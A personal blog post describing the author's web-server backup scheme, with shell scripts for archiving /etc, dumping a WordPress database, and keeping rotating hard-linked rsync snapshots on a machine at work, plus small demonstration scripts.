My Backup Solution

For my first post I’m going to document the backup solution I use on my web server.

The backups happen in two parts:

Step 1 – Make Dumps Of Important Data

First, I create backup files of important non-file data on my web server in a specific place. In my case those files are:

  1. A tarball of the /etc/ directory, with essentially ALL of the configuration data for my system.
  2. Dumps of any databases that I have on the system.

These files are generated by two scripts which are run every night by cron.

The mytar Script

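#!/bin/bash
# usage: mytar DIRECTORY
# Writes DIRECTORY's contents to a dated .tar.bz2 in $DEST.

DATE=$(date +%Y%m%d)
DEST="/home/oneill/backup/local"
dir=$(basename "$1")

tar -jcf "$DEST/$dir.$DATE.tar.bz2" "$1"
# The cron job runs this under sudo, so hand the archive back to my user.
chown oneill:oneill "$DEST/$dir.$DATE.tar.bz2"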

Pretty simple. I call it from cron using the following entry:
47 0 * * * sudo /home/oneill/local/bin/mytar /etc > /dev/null

That means the job runs at 00:47 every day. I discard standard output, but any errors (output to stderr) will be caught by cron and emailed to me. I pick the minute for my cron jobs somewhat at random: I use a VPS (shared with other users), and a random minute makes it less likely that my jobs run at the same time as theirs.
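If you would rather not pick the minute by hand, here is a minimal sketch that prints a crontab entry with a random minute. The helper name cron_line is made up for this example, and you would still paste the output into crontab -e yourself.

```shell
#!/bin/sh
# Hypothetical helper: print a nightly crontab entry with a random minute.
# usage: cron_line HOUR COMMAND
cron_line() {
    # awk's srand() seeds from the clock, which is random enough for this.
    minute=$(awk 'BEGIN { srand(); print int(rand() * 60) }')
    # stdout is discarded; stderr is left alone so cron can mail any errors.
    printf '%s %s * * * %s > /dev/null\n' "$minute" "$1" "$2"
}

line=$(cron_line 0 "sudo /home/oneill/local/bin/mytar /etc")
echo "$line"
```

The only thing that varies between runs is the first field, which is always between 0 and 59.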

The backup_wordpress Script

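#!/bin/sh
# Dump the WordPress database to a single SQL file.

DBNAME="alexrichards"
DBUSER="*****"
DBPASS="*****"

DEST="$HOME/backup/local/$DBNAME.dump.sql"
# -e uses multi-row INSERTs; --create-options keeps table options.
mysqldump -e --create-options -u "$DBUSER" \
      --password="$DBPASS" "$DBNAME" > "$DEST"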

Both sets of files are placed in ~/backup/local/, which is then backed up to a completely different computer.
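One thing to watch with a dump that always writes to the same file name: the shell empties the destination before the dump command even starts, so a failed run can wipe out the last good dump. A possible guard, sketched below, is to write to a temporary file and only rename it on success. The helper name safe_dump is hypothetical, and the demonstration uses printf and false as stand-ins for mysqldump.

```shell
#!/bin/sh
# Hypothetical helper: run a dump command and only replace the previous
# dump if the command succeeded.
# usage: safe_dump DEST COMMAND [ARGS...]
safe_dump() {
    dest=$1
    shift
    tmp="$dest.tmp.$$"
    if "$@" > "$tmp"; then
        # Rename within the same directory, so the old dump is swapped in one step.
        mv "$tmp" "$dest"
    else
        status=$?
        rm -f "$tmp"
        echo "dump failed, keeping previous $dest" >&2
        return "$status"
    fi
}

# Demonstration with stand-in commands instead of mysqldump.
demo_dir=$(mktemp -d)
safe_dump "$demo_dir/db.dump.sql" printf '%s\n' "-- good dump"
safe_dump "$demo_dir/db.dump.sql" false || true
cat "$demo_dir/db.dump.sql"
```

The second call fails, so the file still holds the output of the first one.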

Step 2 – Off-site Backup

I use rsync to make incremental off-site backups onto a computer located under my desk at work.

The backups are rotated, with 4 older copies being kept. This helps me not to panic if, for example, I delete a critical file but don’t notice until AFTER the backup has happened (and the critical file is therefore not present in the most recent backup).
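To make the "don't panic" part concrete, here is a small sketch of how a deleted file could be tracked down in the rotated copies. It assumes the snapshot naming used later in this post (name.0 is the newest, name.4 the oldest); the function name newest_copy is made up for the example.

```shell
#!/bin/sh
# Hypothetical helper: print the newest snapshot path that still contains
# a given file. Snapshots are named NAME.0 (newest) to NAME.4 (oldest).
# usage: newest_copy BACKUP_ROOT NAME RELATIVE_PATH
newest_copy() {
    for n in 0 1 2 3 4; do
        candidate="$1/$2.$n/$3"
        if [ -e "$candidate" ]; then
            printf '%s\n' "$candidate"
            return 0
        fi
    done
    return 1
}

# Demonstration on a throwaway directory tree.
root=$(mktemp -d)
mkdir -p "$root/html.0" "$root/html.1" "$root/html.2"
echo "precious" > "$root/html.2/index.html"   # gone from the two newest copies
found=$(newest_copy "$root" html index.html)
echo "restore from: $found"
```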

To do this rotation, I use a hard-link method in order to save time and disk space.
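If hard links are new to you, this throwaway example shows the idea: two directory entries point at one copy of the data, and the data stays around until the last name is removed. The directory names mirror the snapshot names used below, but everything here lives in a temporary directory.

```shell
#!/bin/sh
# Two directory entries, one copy of the data.
work=$(mktemp -d)
mkdir "$work/html.0" "$work/html.1"
echo "unchanged page" > "$work/html.1/index.html"
ln "$work/html.1/index.html" "$work/html.0/index.html"

# Both names report the same inode number.
inode_old=$(ls -i "$work/html.1/index.html" | awk '{print $1}')
inode_new=$(ls -i "$work/html.0/index.html" | awk '{print $1}')
echo "html.1 inode: $inode_old, html.0 inode: $inode_new"

# Deleting the older snapshot leaves the data reachable via the newer one.
rm -rf "$work/html.1"
cat "$work/html.0/index.html"
```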

Here’s the script I use: mybackup

#!/bin/bash
# usage:       mybackup
# config file: ~/.mybackup
# format:      One directory per line, with 
#              optional rsync destination after

DIRFILE=$HOME/.mybackup
DEFAULT_DEST="/data/backup"
RSYNC_CMD="rsync -a --rsh=ssh --delete --progress"
NUM_SNAPSHOTS=4

if ! [ -f "$DIRFILE" ]; then
	echo "Backup config file $DIRFILE not found" >&2
	exit 1
fi

cat $DIRFILE |while read line; do
	# skip blank lines
	if [ "$line" == "" ]; then
		continue
	fi
	# skip commented lines ('#')
	if [ `expr match "$line" '#'` -gt 0 ]; then
		continue
	fi
	src=`echo $line | awk '{print $1}'`
	dir=`basename $src | awk -F ':' '{print $(NF)}' \
		| awk -F '/' '{print $NF}'`
	dest=`echo $line | awk '{print $2}'`
	if [ "$dest" == "" ]; then
		dest=$DEFAULT_DEST
	fi
	host=`echo $src | awk -F ':' '{print $1}'`
	host=`echo $host |awk -F '@' '{print $NF}'`
	dest="$dest/$host"
	mkdir -p "$dest"
	# shuffle the existing backups
	if [ -e "$dest/$dir.$NUM_SNAPSHOTS" ]; then
		echo "deleting oldest backup $dir.$NUM_SNAPSHOTS"
		rm -rf "$dest/$dir.$NUM_SNAPSHOTS"
	fi
	for j in `seq $NUM_SNAPSHOTS -1 1`; do
		i=$((j - 1))
		if [ -e "$dest/$dir.$i" ]; then
			echo "Found old backup $dir.$i, moving to $dir.$j"
			mv "$dest/$dir.$i" "$dest/$dir.$j"
		fi
	done
	echo "Backing up dir: $src to $dest/$dir.0"
	CMD="$RSYNC_CMD --link-dest=../$dir.1 $src \
		$dest/$dir.0/"
	echo $CMD 
	$CMD
done

mybackup reads the file ~/.mybackup to get a list of locations to back up. In my case, this file looks like this:

potatoriot.com:mail/ /home/oneill/backup/
potatoriot.com:html/ /home/oneill/backup/
potatoriot.com:backup/local/ /home/oneill/backup/

This creates directories like ~/backup/potatoriot.com/html.0 through ~/backup/potatoriot.com/html.4.
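The way a config line turns into a snapshot path can be sketched on its own. The version below is a hypothetical re-statement using shell parameter expansion instead of the awk pipelines in mybackup; the function name parse_line is an assumption, and unlike the original it trims a trailing slash from the destination so the printed path has no double slash.

```shell
#!/bin/sh
# Hypothetical re-statement of how mybackup splits a config line.
# Sets: src, host, dir, dest
parse_line() {
    default_dest=/data/backup
    # Word-split the line into the source and the optional destination.
    set -- $1
    src=$1
    dest=${2:-$default_dest}
    # host: text before the first ':', minus any leading user@.
    host=${src%%:*}
    host=${host##*@}
    # dir: last path component, ignoring a trailing slash.
    dir=${src#*:}
    dir=${dir%/}
    dir=${dir##*/}
    # Snapshots are grouped per host under the destination.
    dest="${dest%/}/$host"
}

parse_line "potatoriot.com:backup/local/ /home/oneill/backup/"
echo "src=$src host=$host dir=$dir snapshot=$dest/$dir.0"
```

Note that only the last path component is used for the snapshot name, so backup/local/ ends up as local.0, local.1 and so on.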

Explanation

First, for each directory to be backed up, the oldest backup is deleted and the others are shuffled along in the backup order (html.3 becomes html.4, html.2 becomes html.3, and so on).
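The shuffle is easy to try out in isolation. This is a stand-alone sketch of that step only, run against labelled dummy directories; the function name rotate and its arguments are made up for the example.

```shell
#!/bin/sh
# Hypothetical stand-alone version of the shuffle step.
# usage: rotate DEST NAME COUNT
rotate() {
    # Drop the oldest snapshot, if there is one.
    rm -rf "$1/$2.$3"
    # Work from oldest to newest so nothing is overwritten.
    j=$3
    while [ "$j" -ge 1 ]; do
        i=$((j - 1))
        if [ -e "$1/$2.$i" ]; then
            mv "$1/$2.$i" "$1/$2.$j"
        fi
        j=$i
    done
}

# Demonstration: label five fake snapshots, rotate, and see where they went.
dest=$(mktemp -d)
for n in 0 1 2 3 4; do
    mkdir "$dest/html.$n"
    echo "was html.$n" > "$dest/html.$n/label"
done
rotate "$dest" html 4
cat "$dest/html.4/label"   # prints "was html.3"
ls "$dest"                 # html.1 to html.4; html.0 is free for the new copy
```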

Next, a fresh copy of the source is produced using rsync with the --link-dest argument, which creates hard links to the files in html.1 where possible:
CMD="$RSYNC_CMD --link-dest=../$dir.1 $src $dest/$dir.0/"
This hard-link strategy means that any file that exists and is identical in html.1 will not be copied into the new directory, which saves space. Nor will it be copied over the network, thanks to the magic of rsync. Even if the file has changed, rsync uses the copy in html.1 as a starting point, so only the differences are sent over the network.
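You can watch --link-dest at work without a remote host. The sketch below runs rsync between two local temporary directories, which is an assumption made purely so it can be tried anywhere; it skips itself if rsync is not installed.

```shell
#!/bin/sh
# Local demonstration of --link-dest; the real script pulls from a remote host.
work=$(mktemp -d)
mkdir -p "$work/src" "$work/backup"
echo "unchanged" > "$work/src/same.txt"
echo "version 1" > "$work/src/edited.txt"

if command -v rsync > /dev/null 2>&1; then
    # Yesterday's snapshot.
    rsync -a "$work/src/" "$work/backup/html.1/"
    # One file changes before tonight's run.
    echo "version 2, now longer" > "$work/src/edited.txt"
    # Tonight's snapshot; a relative --link-dest is resolved against
    # the destination directory, so ../html.1 means backup/html.1.
    rsync -a --link-dest=../html.1 "$work/src/" "$work/backup/html.0/"
    # same.txt shares one inode across both snapshots, edited.txt does not.
    ls -i "$work/backup/html.0" "$work/backup/html.1"
else
    echo "rsync not installed, skipping demonstration" >&2
fi
```

The older snapshot keeps its own copy of edited.txt, so both versions remain available.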

This strategy makes backing up extremely efficient. The backup uses approximately the same amount of space as the original files do, even though I have 4 older revisions available should anything have changed.

I run mybackup every night via a cron job. I chose the time to be at least an hour after the cron jobs on the web server, so that I get the latest database dumps in the backup.
